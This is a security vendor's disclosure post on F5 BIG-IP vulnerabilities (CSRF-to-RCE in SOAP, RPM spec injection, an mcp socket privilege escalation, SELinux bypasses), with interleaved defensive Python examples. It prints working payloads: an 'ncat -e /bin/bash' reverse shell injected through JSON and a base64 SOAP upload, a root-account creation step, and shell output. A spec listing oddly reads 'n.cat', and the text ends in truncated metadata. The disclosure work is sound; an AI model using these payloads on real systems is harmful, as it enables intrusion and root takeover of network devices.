
Rapid7 discovered several vulnerabilities and exposures in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS detailed in F5's [Base Operating Systems](<https://support.f5.com/csp/article/K121>) support article. The affected products are detailed in the vendor advisories below:
* [CVE-2022-41622](<https://support.f5.com/csp/article/K94221585>): BIG-IP and BIG-IQ are vulnerable to unauthenticated remote code execution via cross-site request forgery (CSRF)
* [CVE-2022-41800](<https://support.f5.com/csp/article/K13325942>): Appliance mode iControl REST is vulnerable to authenticated remote code execution via RPM spec injection
Rapid7 also discovered several bypasses of security controls that F5 does not consider vulnerabilities with a reasonable attack surface ([K05403841](<https://support.f5.com/csp/article/K05403841>)):
* ID1145045 - Local privilege escalation via bad UNIX socket permissions ([CWE-269](<https://cwe.mitre.org/data/definitions/269.html>))
* ID1144093 - SELinux bypass via incorrect file context ([CWE-732](<https://cwe.mitre.org/data/definitions/732.html>))
* ID1144057 - SELinux bypass via command injection in an update script ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))
Note: the presence of SELinux hardening on F5 devices is an excellent safeguard that made our exploitation attempts more difficult.
Rapid7 initially reported these vulnerabilities to F5 on August 18, 2022. Since then, members of our research team have worked with the vendor to discuss impact, resolution, and a coordinated response.
## Product description
Several F5 products, namely in the BIG-IP family of traffic-shaping devices, are affected by the vulnerabilities. These devices and applications are typically exposed to the internet for normal functionality, but the management ports where these vulnerabilities occur are typically internal-facing.
For more information on the affected products, see the vendor's [advisory](<https://support.f5.com/csp/article/K97843387>), and the vendor's [product website](<https://www.f5.com/products>).
## Impact
We believe that widespread exploitation of the issues in this disclosure is unlikely. That being said, by successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing). However, that would require a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network).
Most of the remaining vulnerabilities are relatively minor, and require the attacker to already have some level of access to the target device. They are more likely to be leveraged as part of an exploit chain to exacerbate more serious vulnerabilities.
At time of publishing, F5 was not aware of any exploitation of these vulnerabilities.
## Credit
These vulnerabilities were discovered and documented by Ron Bowes, Lead Security Researcher at Rapid7. They are being disclosed in accordance with Rapid7’s [vulnerability disclosure policy](<https://www.rapid7.com/disclosure/>).
## Vendor statement
F5 is committed to security, and we collaborate with valued researchers, such as Rapid7, to respond to and resolve vulnerabilities on behalf of our customers.
## Exploitation
### CVE-2022-41622 - Unauthenticated Remote Code Execution in SOAP API via CSRF
F5 Big-IP's SOAP API (the endpoint `/iControl/iControlPortal.cgi`) does not have cross-site request forgery (CSRF) protection, nor does it require a correct `Content-Type` or other typical SOAP API protections. Consequently, if a user (who is authenticated to an F5 Big-IP device) visits an attacker-controlled website (or is redirected there via an open redirect or cross-site scripting), an attacker can run arbitrary SOAP commands against the F5 Big-IP SOAP API in the authenticated user's session. That could lead to remote code execution in several different ways, which we demonstrated in a [proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>).
Note: several of the exploit paths require SELinux bypasses, which we have detailed below.
The API endpoint for SOAP requests, `iControlPortal.cgi`, which is accessible at `/iControl/iControlPortal.cgi`, is a CGI script that is SetUID root — that is, it executes as root:
```
ls -l /usr/local/www/iControl/iControlPortal.cgi
-rwsr-xr-x. 1 root root 2931172 Jul 15 01:13 /usr/local/www/iControl/iControlPortal.cgi
```
The script authenticates the user via HTTP Basic authentication and accepts XML SOAP requests. The XML API is quite complex with many different API endpoints available to use. We chose the `upload_file` and `create_user_3` endpoints as examples in our PoC, because they demonstrate the impact of the exploit concisely. We didn't find a way to immediately run code on the target host, but our investigation did not include every possible API endpoint.
[The PoC README.md file](<https://github.com/rbowes-r7/refreshing-soap-exploit/blob/main/README.md>) has full details on the payloads we tested and how to use them to execute arbitrary code at reboot or login.
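The remediation section later in this post says that "normal anti-CSRF techniques" stop this exploit. The following is an added example (not code from Rapid7's PoC or from F5) of what those checks look like as a request gate in front of a SOAP endpoint like `/iControl/iControlPortal.cgi`: enforce a real SOAP `Content-Type` (a cross-site HTML form can only send form or `text/plain` types, and a cross-site `fetch()` with `text/xml` triggers a CORS preflight), reject a mismatched `Origin`/`Referer`, and require a custom header that a forged cross-site request cannot carry. The header name and the sample header sets are assumptions constructed for the example.

```python
"""Added example: anti-CSRF gate for a SOAP endpoint. Not F5's code; the
custom header name is an assumption, and the sample requests are constructed."""
from urllib.parse import urlsplit

# Content types a genuine SOAP client sends. A cross-site HTML form can only
# produce application/x-www-form-urlencoded, multipart/form-data or text/plain.
SOAP_CONTENT_TYPES = {"text/xml", "application/soap+xml"}

# A browser will not attach a custom header to a cross-origin request without a
# successful CORS preflight, so its presence proves the request was not forged
# by a plain form post. (Assumed name; any custom header works.)
CSRF_HEADER = "x-requested-with"


def check_soap_request(headers: dict, expected_host: str) -> tuple:
    """Return (allowed, reason). `headers` is the raw HTTP header mapping;
    `expected_host` is the host[:port] the management interface is served on."""
    h = {k.lower(): v for k, v in headers.items()}

    # 1. Content-Type must be a SOAP type. The text above notes that the
    #    endpoint does not enforce this, which is what lets an HTML form reach it.
    ctype = h.get("content-type", "").split(";", 1)[0].strip().lower()
    if ctype not in SOAP_CONTENT_TYPES:
        return False, f"unexpected Content-Type {ctype or '(none)'}"

    # 2. Browsers attach Origin (or at least Referer) to cross-site POSTs. When
    #    present it must name our own host. Absent headers are tolerated so that
    #    non-browser API clients (curl, SDKs) keep working.
    source = h.get("origin") or h.get("referer")
    if source and urlsplit(source).netloc.lower() != expected_host.lower():
        return False, f"cross-origin request from {source}"

    # 3. Require the custom header; a forged cross-site request cannot carry it.
    if CSRF_HEADER not in h:
        return False, f"missing {CSRF_HEADER} header"

    return True, "ok"


# Constructed sample requests (not captured traffic).
FORGED_FORM_POST = {            # what an attacker-controlled page can produce
    "Content-Type": "application/x-www-form-urlencoded",
    "Origin": "https://attacker.example",
}
FORGED_CROSS_ORIGIN_XML = {     # right Content-Type, wrong origin, no header
    "Content-Type": "text/xml",
    "Origin": "https://attacker.example",
}
LEGITIMATE_CLIENT = {           # an API client talking to the management host
    "Content-Type": "text/xml; charset=utf-8",
    "X-Requested-With": "XMLHttpRequest",
    "Origin": "https://10.0.0.162",
}

if __name__ == "__main__":
    for name, hdrs in (("forged form", FORGED_FORM_POST),
                       ("forged xml", FORGED_CROSS_ORIGIN_XML),
                       ("legitimate", LEGITIMATE_CLIENT)):
        print(f"{name:12s} -> {check_soap_request(hdrs, '10.0.0.162')}")
```

Any one of the three checks defeats a simple form-based CSRF on its own; layering them means a future relaxation of one (for instance, accepting a broader `Content-Type`) does not silently reopen the hole.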
### CVE-2022-41800 - Authenticated Remote Code Execution via RPM Spec Injection
F5 Big-IP's JSON API includes an administrator-only endpoint that creates an RPM specification file (`.rpmspec`). That file is consumed by another administrator-only endpoint to create an RPM file. Both endpoints are vulnerable to injection attacks into the RPM spec file, where additional fields could be added to the spec using newlines. Notably, an attacker could add executable shell commands that run when the resultant RPM file is created. This would give authenticated administrators (who may be malicious insiders, users of compromised accounts, etc) the ability to run shell commands using an endpoint that is not designed or documented as having that functionality.
Although F5 considered this noteworthy enough to assign CVE-2022-41800, we consider the risk of this vulnerability to be low. While the results are surprising, this exploit requires an administrator login, and other endpoints already exist (such as `/mgmt/tm/util/bash`) that are capable of executing shell commands by design. That said, this technique can bypass blocklists or alerts that an administrator might set up for the well-known `bash` endpoint.
To demonstrate the vulnerability, we developed this JSON payload:
```json
{
  "specFileData": {
    "name": "test",
    "srcBasePath": "/tmp",
    "version": "test6",
    "release": "test7",
    "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444",
    "summary": "test9"
  }
}
```
Note the newlines and `%check` in the `description` field, which according to [the documentation](<https://rpm-software-management.github.io/rpm/manual/spec.html>) is typically used to run tests. We sent that JSON as part of an authenticated request to `/rpm-spec-creator`:
```
$ curl -sk -uadmin:Password1 -H "Content-Type: application/json" -X POST https://10.0.0.162/mgmt/shared/iapp/rpm-spec-creator --data '{"specFileData": {"name": "test", "srcBasePath": "/tmp", "version": "test6", "release": "test7", "description": "test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444", "summary": "test9"}}'
{"specFileData":{"name":"test","srcBasePath":"/tmp","version":"test6","release":"test7","description":"test8\n\n%check\nncat -e /bin/bash 10.0.0.179 4444","summary":"test9","user":"restnoded","group":"restnoded"},"specFilePath":"/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec"}
```
The server responds with a `specFilePath` containing the spec we created. Here's what the file looks like on the file system:
```
$ ssh root@10.0.0.162 cat /var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec
Summary: test9
Name: test
Version: test6
Release: test7
BuildArch: noarch
Group: Development/Libraries
License: Commercial
Packager: F5 Networks <support@f5.com>

%description
test8

%check
n.cat -e /bin/bash 10.0.0.179 4444

[...]
```
We start our listener on the host/port specified in the `ncat` command:
```
$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
```
And build the RPM with `/build-package` (using `jq` to format the output):
```sh
$ curl -X POST -sku admin:Password1 https://10.0.0.162/mgmt/shared/iapp/build-package --data '{"state": {}, "appName": "test", "packageDirectory": "/tmp", "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec", "force": true }' | jq
{
  "step": "RUN_BUILD_RPM_TASK",
  "packageDirectory": "/tmp",
  "appName": "test",
  "specFilePath": "/var/config/rest/node/tmp/e1816b74-cb67-4c96-b4f0-4be45b0f61a5.spec",
  "force": true,
  "rpmDescription": "Default exported iApp description.",
  "rpmSummary": "Default exported iApp summary.",
  "isSpecFileToCleanUp": false,
  "id": "5de02c7f-ac65-4fa0-8c2b-b541967ce578",
  "status": "CREATED",
  "userReference": {
    "link": "https://localhost/mgmt/shared/authz/users/admin"
  },
  "identityReferences": [
    {
      "link": "https://localhost/mgmt/shared/authz/users/admin"
    }
  ],
  "ownerMachineId": "97163127-c56e-456c-af33-752dec349873",
  "generation": 1,
  "lastUpdateMicros": 1666214391730921,
  "kind": "shared:iapp:build-package:buildrpmtaskstate",
  "selfLink": "https://localhost/mgmt/shared/iapp/build-package/5de02c7f-ac65-4fa0-8c2b-b541967ce578"
}
```
Then, we verify that we get a root shell on our listener:

```
$ nc -v -l -p 4444
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on 0.0.0.0:4444
Ncat: Connection from 10.0.0.162.
Ncat: Connection from 10.0.0.162:58068.

whoami
root
```
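The root cause of CVE-2022-41800 is that caller-supplied fields are written straight into the spec file, so a newline followed by `%check` opens a new section that `rpmbuild` executes. The following is an added example, not F5's code, contrasting that weak pattern with a builder that validates every field before rendering, plus a small helper that lists the section directives a written spec contains (anything beyond `%description` in a file produced by this endpoint is a sign of injection). The spec layout copies the file shown above; which fields F5's real endpoint writes beyond those is an assumption, and the injected payload uses a harmless `touch` in place of the reverse shell.

```python
"""Added example: vulnerable vs. hardened RPM spec rendering. Not F5's code;
field set and layout are assumptions modelled on the spec file shown above."""
import re

SINGLE_LINE_FIELDS = ("name", "version", "release", "summary", "srcBasePath")

# RPM identifier rules: a name may not contain whitespace; version and release
# may not contain '-' because it separates name-version-release.
NAME_RE = re.compile(r"^[A-Za-z0-9._+-]+$")
VERSION_RE = re.compile(r"^[A-Za-z0-9._+~]+$")


def render_spec_unchecked(f: dict) -> str:
    """The weak pattern: caller-controlled strings go straight into the spec."""
    return (
        f"Summary: {f['summary']}\n"
        f"Name: {f['name']}\n"
        f"Version: {f['version']}\n"
        f"Release: {f['release']}\n"
        "BuildArch: noarch\n"
        "Group: Development/Libraries\n"
        "License: Commercial\n"
        "\n%description\n"
        f"{f['description']}\n"
    )


def validate_spec_fields(f: dict) -> None:
    """Raise ValueError on anything that could start a new spec line or section.
    '%' introduces sections (%check, %build, ...) and macros, including %(...)
    shell expansion, so it is rejected outright rather than escaped."""
    for key in SINGLE_LINE_FIELDS + ("description",):
        value = f.get(key)
        if not isinstance(value, str) or not value:
            raise ValueError(f"{key}: missing or not a string")
        if "\r" in value or "\x00" in value or "%" in value:
            raise ValueError(f"{key}: control character or '%' not allowed")
    for key in SINGLE_LINE_FIELDS:          # description may legitimately span lines
        if "\n" in f[key]:
            raise ValueError(f"{key}: newline not allowed in a single-line field")
    if not NAME_RE.match(f["name"]):
        raise ValueError("name: invalid characters")
    for key in ("version", "release"):
        if not VERSION_RE.match(f[key]):
            raise ValueError(f"{key}: invalid characters")


def render_spec(f: dict) -> str:
    """Hardened builder: validate, then render with the same layout."""
    validate_spec_fields(f)
    return render_spec_unchecked(f)


def rejects(f: dict) -> bool:
    """True if the hardened builder refuses these fields."""
    try:
        render_spec(f)
    except ValueError:
        return True
    return False


def spec_sections(spec_text: str) -> list:
    """Section directives in a spec file, in order. Useful for auditing specs
    already written under /var/config/rest/node/tmp/ (path from the text above)."""
    return [line.split()[0][1:] for line in spec_text.splitlines()
            if line.startswith("%")]


# Constructed payload shaped like the one above; a harmless command stands in.
INJECTED = {
    "name": "test", "srcBasePath": "/tmp", "version": "test6",
    "release": "test7", "summary": "test9",
    "description": "test8\n\n%check\ntouch /tmp/spec-injection-marker",
}
CLEAN = dict(INJECTED, description="A benign two-line\ndescription.")

if __name__ == "__main__":
    print("unchecked sections:", spec_sections(render_spec_unchecked(INJECTED)))
    print("hardened rejects payload:", rejects(INJECTED))
    print("hardened sections:", spec_sections(render_spec(CLEAN)))
```

Rejecting `%` entirely is deliberately conservative; an endpoint that must accept percent signs in free text would need to escape them (`%%`) and still reject any line that begins with `%`.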
### ID1145045 - Local Privilege Escalation via UNIX Socket Permissions
F5 uses a proprietary database called `mcp`, which is used for persistent storage on Big-IP (and related) devices. The database is owned by root and accessed via a UNIX domain socket with 0777 permissions (accessible by all local users) and no authentication:
```
# ls -l /var/run/mcp
srwxrwxrwx. 1 root root 0 Oct 19 14:12 /var/run/mcp
```
We can connect to it and perform queries using `socat`, which is (helpfully) installed by default.
As part of our research, we fully documented the protocol, including [writing a tool](<https://github.com/rbowes-r7/refreshing-mcp-tool>) that can parse queries, create arbitrary queries, and remotely eavesdrop on traffic via an authenticated SSH connection. While the [list of supported object types](<https://github.com/rbowes-r7/refreshing-mcp-tool/blob/main/mcp-objects.txt>) is extensive, we targeted the user-management code since our goal was security bypasses.
We developed a script called `mcp-privesc.rb`, which is also included in that repository. The script creates a root-level account when its output is sent to that socket, as well as a pre-built `escalationplz.bin` payload that creates a `rontest` / `Password1` account when sent to the socket.
Here's how we used the tool to create a message. Note: we gzipped it for size reasons, then base64-encoded it so we could copy/paste more easily. Output is truncated for the blog, but the full text is included in the `README.md` file in the repository:

```
$ ruby ./mcp-privesc.rb blogtest MyFunPW | gzip | base64 -w0
Attempting to create a crypt-sha512 hash of the password
Writing an `mcp` message to stdout that'll create an account: blogtest / $6$vdznqfyc$q9L[...]1
Send it to the target using: socat -t100 - UNIX-CONNECT:/var/run/mcp < mcpmessage.bin

H4s[...]A==
```
Then, from a non-root account, we send the message to the socket and verify the account exists:
```
$ whoami
apache

$ echo -ne 'H4s[...]A==' | base64 -d | gunzip - | socat -t100 - UNIX-CONNECT:/var/run/mcp | gzip | base64 -w0
H4sIAB91UGMAA2NgYJBjQALcIQy8QEqMO5SBFcwPZ+AR0OCOAJKaYAUEVXNHgVRzCzIwAABM8W1YXAAAAA==

bash-4.2$ su blogtest
Password:
[...]

[blogtest@localhost:NO LICENSE:Standalone] config # whoami
root
```
F5 claims this is not a vulnerability, because, by design, all users that log in are already root (and it's true that the overwhelming amount of Big-IP's attack surface runs as root already). However, several network services—including Apache, Tomcat, and Bind—listen on network ports and link to custom modules written in C/C++. If a vulnerability is discovered in any of those non-root services, a privilege escalation exploit path directly to root removes the small amount of privilege separation that exists.
### ID1144093 - SELinux Bypass via Incorrect File Context
After finding an arbitrary file write SOAP endpoint, we found that SELinux limited our ability to actually exploit the issue. Despite the SOAP endpoint (`iControlPortal.cgi`) being set-UID root, and therefore executing as a privileged process, it could not create or overwrite sensitive files due to being part of a restricted SELinux context. That means that we couldn't use obvious attack paths like adding a script to `/etc/profile.d` or replacing `/var/ssh/root/authorized_keys`.
We did, however, find exactly one file in `/etc/profile.d` that was writable from the SOAP process due to it being a symbolic link to another location:
```
# ls -l /etc/profile.d/timeout.sh
lrwxrwxrwx. 1 root root 31 Jul 15 02:48 /etc/profile.d/timeout.sh -> ../../var/run/config/timeout.sh

# ls -l /var/run/config/timeout.sh
-r--r--r--. 1 root root 303 Oct 19 15:40 /var/run/config/timeout.sh
```
If we replace `/var/run/config/timeout.sh` with our own script via the SOAP interface, which we can (despite the file itself not having write permission), it will execute next time a user logs in via SSH and `/etc/profile.d` scripts execute. We use that file as a target in our [SOAP exploit proof of concept](<https://github.com/rbowes-r7/refreshing-soap-exploit>):
```xml
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">
  <soapenv:Header/>
  <soapenv:Body>
    <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <file_name xsi:type="xsd:string">/var/run/config/timeout.sh</file_name>
      <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
        <!--type: Common.OctetSequence-->
        <file_data xsi:type="urn:Common.OctetSequence">[...]</file_data>
        <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>
      </file_context>
    </con:upload_file>
  </soapenv:Body>
</soapenv:Envelope>
```
F5 argues that this is not a vulnerability, because it requires a different vulnerability to exist before it can be leveraged (as we demonstrated with CVE-2022-41622 above). As a result, it was not assigned a CVE. However, Rapid7 considers this a vulnerability because it bypasses a security boundary — namely, SELinux. Without these SELinux bypasses, turning an arbitrary file write into code execution would be difficult, since most files an attacker would typically create or replace to exploit a file-write vulnerability (such as adding a script to `/etc/profile.d`) are blocked.
### ID1144057 - SELinux bypass via Command Injection in Startup Script
The script `/bin/f5_update_checker`, which is executed at boot, is vulnerable to command injection in its configuration file (`/shared/f5_update_action`). Several strings in the file are passed directly into shell commands, where arbitrary bash commands can be injected using backticks, semicolons, or any other typical [CWE-78](<https://cwe.mitre.org/data/definitions/78.html>) technique.
This one is interesting, because we found it quite early in our research but didn’t recognize its significance until much later. During our initial analysis, `f5_update_checker` caught our eye because it runs at boot, performs some sort of nebulous update check (ironically, update mechanisms are [a common source](<https://ieeexplore.ieee.org/document/6769681>) of security vulnerabilities), and is a 32-bit ELF binary written in C++. Additionally, running `strings` showed that it uses `curl` insecurely, with `-k`:
```
# strings $(which f5_update_checker)
[...]
curl -g -k -m 30 -s -f -o /dev/null
```
When `f5_update_checker` starts, it loads and parses a configuration file called `/shared/f5_update_action`, which doesn't exist by default. In fact, as far as we can tell, absolutely nothing else on the entire operating system is aware of `/shared/f5_update_action`! Out of curiosity, we reverse engineered the file format from the binary, since the process won't start without a valid (enough) file, and found it's line-based and looks something like:
```
AAA
http://localhost:1234/success
http://localhost:1234/failure
0
0
0
0
```
The URLs are passed directly into `curl` with no escaping (not even quotes, in fact), so we can add in arbitrary commands however we like:
```
AAA
http://localhost:1234/success`touch /tmp/testshellinjection`
http://localhost:1234/failure
0
0
0
0
```
At the next reboot, `f5_update_checker` will execute, load the configuration file, pause for two minutes (by design), then execute the command.
At that point, we shelved this as not interesting with the note:
> `f5_update_checker` consumes a file `/shared/f5_update_action` and grabs a URL from it. That leads to a bunch of problems - shell injection, SSRF, etc. But nothing seems to use any of this, so I guess it's all a dud
Much later, we found the SOAP bypass discussed above, but lamented that while we could upload a file to anywhere on the filesystem as root, we couldn't overwrite anything of value due to SELinux policies! After thinking for way too long, we remembered the seemingly innocuous vulnerability that we'd found a month earlier, recalled that it references a non-extant file, and tested it with SOAP. Sure enough, it worked!
Here is an example of a SOAP request that will plant a malicious `/shared/f5_update_action` file:
```xml
<soapenv:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:con="urn:iControl:System/ConfigSync">
  <soapenv:Header/>
  <soapenv:Body>
    <con:upload_file soapenv:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
      <file_name xsi:type="xsd:string">/shared/f5_update_action</file_name>
      <file_context xsi:type="urn:System.ConfigSync.FileTransferContext" xmlns:urn="urn:iControl">
        <!--type: Common.OctetSequence-->
        <file_data xsi:type="urn:Common.OctetSequence">QUFBCmh0dHBzOi8vbG9jYWxob3N0L3N1Y2Nlc3NgbmNhdCAtZSAvYmluL2Jhc2ggMTAuMC4wLjE3OSA0NDQ0YApodHRwczovL2xvY2FsaG9zdC9lcnJvcgowCjAKMAowCg==</file_data>
        <chain_type xsi:type="urn:Common.FileChainType">FILE_FIRST_AND_LAST</chain_type>
      </file_context>
    </con:upload_file>
  </soapenv:Body>
</soapenv:Envelope>
```
This is an interesting case in which a low-risk vulnerability can actually be meaningfully leveraged, in the right context. Specifically, we found a way to bypass SELinux and create some sneaky persistence.
As with some of the other issues documented here, F5 does not consider this to be a vulnerability and did not assign it a CVE (but do plan to fix it). Rapid7 disagrees with their assessment because SELinux is a security boundary, and bypassing SELinux is a security issue. We'd normally consider this to be a very low-risk vulnerability, but because we used it as part of the exploit chain to turn CVE-2022-41622 into code execution, we believe it is important.
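The three exposures without CVEs (ID1145045, ID1144093 and ID1144057) each leave a checkable trace on the filesystem: a world-writable `/var/run/mcp` socket, a `/etc/profile.d` entry that is a symlink into a writable location, and a `/shared/f5_update_action` file that, per the text above, does not exist on a stock device and whose URL lines should never contain shell metacharacters. The following is an added example (not Rapid7's tool or F5's code) of a read-only audit that reports those conditions. It takes a filesystem root so it can be pointed at a mounted image, a chroot or, as in the built-in demo, a constructed directory tree; the finding codes and the demo tree are this example's own.

```python
"""Added example: read-only audit for the three exposures described above.
Not Rapid7's or F5's code. Paths come from the text; finding codes and the
constructed demo tree are this example's own."""
import os
import stat
import tempfile

MCP_SOCKET = "var/run/mcp"
UPDATE_ACTION = "shared/f5_update_action"
PROFILE_D = "etc/profile.d"
# Heuristic: characters that would let a URL line spill into a shell command
# when interpolated unquoted (a legitimate '&' in a query string also trips it,
# which is acceptable given the file should not exist at all).
SHELL_META = ("`", "$(", ";", "|", "&")


def _resolve_link(root: str, link_path: str) -> str:
    """Resolve one symlink level relative to `root`, not the live system."""
    target = os.readlink(link_path)
    if target.startswith("/"):
        return os.path.normpath(os.path.join(root, target.lstrip("/")))
    return os.path.normpath(os.path.join(os.path.dirname(link_path), target))


def audit(root: str = "/") -> list:
    """Return (code, path, detail) tuples; an empty list means nothing found."""
    findings = []

    # ID1145045: the mcp socket must not be writable by every local user.
    p = os.path.join(root, MCP_SOCKET)
    if os.path.lexists(p):
        st = os.lstat(p)
        if st.st_mode & stat.S_IWOTH:
            kind = "socket" if stat.S_ISSOCK(st.st_mode) else "file"
            findings.append(("MCP_WORLD_WRITABLE", p,
                             f"{kind} mode {stat.S_IMODE(st.st_mode):04o}"))

    # ID1144057: the config file is absent on a stock device, so its presence
    # alone deserves a look; metacharacters in the URL lines (2 and 3) indicate
    # the injection described above.
    p = os.path.join(root, UPDATE_ACTION)
    if os.path.lexists(p):
        findings.append(("UPDATE_ACTION_PRESENT", p, "file exists"))
        try:
            with open(p, "r", errors="replace") as fh:
                lines = fh.read().splitlines()
        except OSError:
            lines = []
        for idx in (1, 2):
            if idx < len(lines) and any(m in lines[idx] for m in SHELL_META):
                findings.append(("UPDATE_ACTION_SHELL_META", p,
                                 f"line {idx + 1}: {lines[idx]!r}"))

    # ID1144093: login scripts reached through symlinks that leave /etc.
    d = os.path.join(root, PROFILE_D)
    etc_root = os.path.normpath(os.path.join(root, "etc"))
    if os.path.isdir(d):
        for name in sorted(os.listdir(d)):
            link = os.path.join(d, name)
            if os.path.islink(link):
                target = _resolve_link(root, link)
                if not target.startswith(etc_root + os.sep):
                    findings.append(("PROFILE_D_LINK_OUTSIDE_ETC", link, f"-> {target}"))
    return findings


def build_demo_root(vulnerable: bool = True) -> str:
    """Constructed tree reproducing the three conditions (or a clean baseline)."""
    root = tempfile.mkdtemp(prefix="f5audit-")
    for rel in ("var/run/config", "shared", PROFILE_D):
        os.makedirs(os.path.join(root, rel), exist_ok=True)
    sock = os.path.join(root, MCP_SOCKET)
    open(sock, "w").close()                      # stands in for the UNIX socket
    os.chmod(sock, 0o777 if vulnerable else 0o660)
    if vulnerable:
        with open(os.path.join(root, UPDATE_ACTION), "w") as fh:
            fh.write("AAA\nhttp://localhost:1234/success`touch /tmp/testshellinjection`\n"
                     "http://localhost:1234/failure\n0\n0\n0\n0\n")
        os.symlink("../../var/run/config/timeout.sh",
                   os.path.join(root, PROFILE_D, "timeout.sh"))
    else:
        with open(os.path.join(root, PROFILE_D, "lang.sh"), "w") as fh:
            fh.write("# stock profile script\n")
    return root


def demo_codes(vulnerable: bool = True) -> list:
    """Distinct finding codes produced against the constructed demo tree."""
    return sorted({code for code, _, _ in audit(build_demo_root(vulnerable))})


if __name__ == "__main__":
    for finding in audit(build_demo_root()):
        print(*finding)
```

Run `audit("/")` on a device (or on a mounted backup) to get the same tuples for the live system; the demo tree exists only so the logic can be exercised offline.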
## Remediation
F5 has provided the following remediation advice:
F5 recommends customers review the security advisories published for these issues and evaluate their risk. Engineering hotfixes are available on request for both CVEs, and fixes for all of the issues will be included in future releases.
The known exploitation methods for CVE-2022-41622 require the attacker to know the address for a particular BIG-IP and successfully enact a Cross-Site Request Forgery against an administrator who is using the same browser to browse the web as well as manage their BIG-IP. Normal anti-CSRF techniques will prevent this exploit from succeeding; see [K94221585](<https://support.f5.com/csp/article/K94221585>) for more details.
The known exploitation methods for CVE-2022-41800 require that an attacker be authenticated as a valid user with Resource Admin or greater privileges. Therefore, the impact is limited to those customers running with Appliance Mode enabled; see [K12815](<https://support.f5.com/csp/article/K12815>) for more information on Appliance Mode.
## Timeline
* July, 2022: Issues identified by Rapid7 researcher [Ron Bowes](<https://infosec.exchange/web/@iagox86>)
* Thu, Aug 18, 2022: Privately disclosed findings to [F5 PSIRT](<https://support.f5.com/csp/article/K4602>) per [Rapid7's CVD policy](<https://www.rapid7.com/security/disclosure/#zeroday>)
* Aug-Sep, 2022: Discussion and clarification about the issues with F5
* Thu, Sep 8, 2022: Extension on vulnerability disclosure date requested, offered Nov 17, 2022
* Fri, Sep 30, 2022: [CVE-2022-41622](<https://www.cve.org/CVERecord?id=CVE-2022-41622>) and [CVE-2022-41800](<https://www.cve.org/CVERecord?id=CVE-2022-41800>) reserved by F5
* Wed, Oct 5, 2022: Disclosure date moved to Wed, Nov 16, 2022
* Wed, Nov 16, 2022: This public disclosure
## Rapid7 customers
InsightVM and Nexpose customers will be able to assess their exposure to CVE-2022-41622 and CVE-2022-41800 with authenticated vulnerability checks for BIG-IP, expected to be available in the November 16, 2022 content release.
{"id": "RAPID7BLOG:2EA2AEC7121196EE114119D8826C749D", "vendorId": null, "type": "rapid7blog", "bulletinFamily": "info", "title": "CVE-2022-41622 and CVE-2022-41800 (FIXED): F5 BIG-IP and iControl REST Vulnerabilities and Exposures", "description": "\n\nRapid7 discovered several vulnerabilities and exposures in F5 BIG-IP and BIG-IQ devices running a customized distribution of CentOS detailed in F5's [Base Operating Systems](<https://support.f5.com/csp/article/K121>) support article. The affected products are detailed in the vendor advisories below:\n\n * [CVE-2022-41622](<https://support.f5.com/csp/article/K94221585>): BIG-IP and BIG-IQ are vulnerable to unauthenticated remote code execution via cross-site request forgery (CSRF)\n * [CVE-2022-41800](<https://support.f5.com/csp/article/K13325942>): Appliance mode iControl REST is vulnerable to authenticated remote code execution via RPM spec injection\n\nRapid7 also discovered several bypasses of security controls that F5 does not consider vulnerabilities with a reasonable attack surface ([K05403841](<https://support.f5.com/csp/article/K05403841>)):\n\n * ID1145045 - Local privilege escalation via bad UNIX socket permissions ([CWE-269](<https://cwe.mitre.org/data/definitions/269.html>))\n * ID1144093 - SELinux bypass via incorrect file context ([CWE-732](<https://cwe.mitre.org/data/definitions/732.html>))\n * ID1144057 - SELinux bypass via command injection in an update script ([CWE-78](<https://cwe.mitre.org/data/definitions/78.html>))\n\nNote: the presence of SELinux hardening on F5 devices is an excellent safeguard that made our exploitation attempts more difficult.\n\nRapid7 initially reported these vulnerabilities to F5 on August 18, 2022. Since then, members of our research team have worked with the vendor to discuss impact, resolution, and a coordinated response.\n\n## Product description\n\nSeveral F5 products, namely in the BIG-IP family of traffic-shaping devices, are affected by the vulnerabilities. 
These devices and applications are typically exposed to the internet for normal functionality, but the management ports where these vulnerabilities occur are typically internal-facing.\n\nFor more information on the affected products, see the vendor's [advisory](<https://support.f5.com/csp/article/K97843387>), and the vendor's [product website](<https://www.f5.com/products>).\n\n## Impact\n\nWe believe that widespread exploitation of the issues in this disclosure is unlikely. That being said, by successfully exploiting the worst of the vulnerabilities (CVE-2022-41622), an attacker could gain persistent root access to the device's management interface (even if the management interface is not internet-facing). However, that would require a confluence of factors to actually be exploitable (an administrator with an active session would need to visit a hostile website, and an attacker would have to have some knowledge of the target network).\n\nMost of the remaining vulnerabilities are relatively minor, and require the attacker to already have some level of access to the target device. They are more likely to be leveraged as part of an exploit chain to exacerbate more serious vulnerabilities.\n\nAt time of publishing, F5 was not aware of any exploitation of these vulnerabilities.\n\n## Credit\n\nThese vulnerabilities were discovered and documented by Ron Bowes, Lead Security Researcher at Rapid7. 
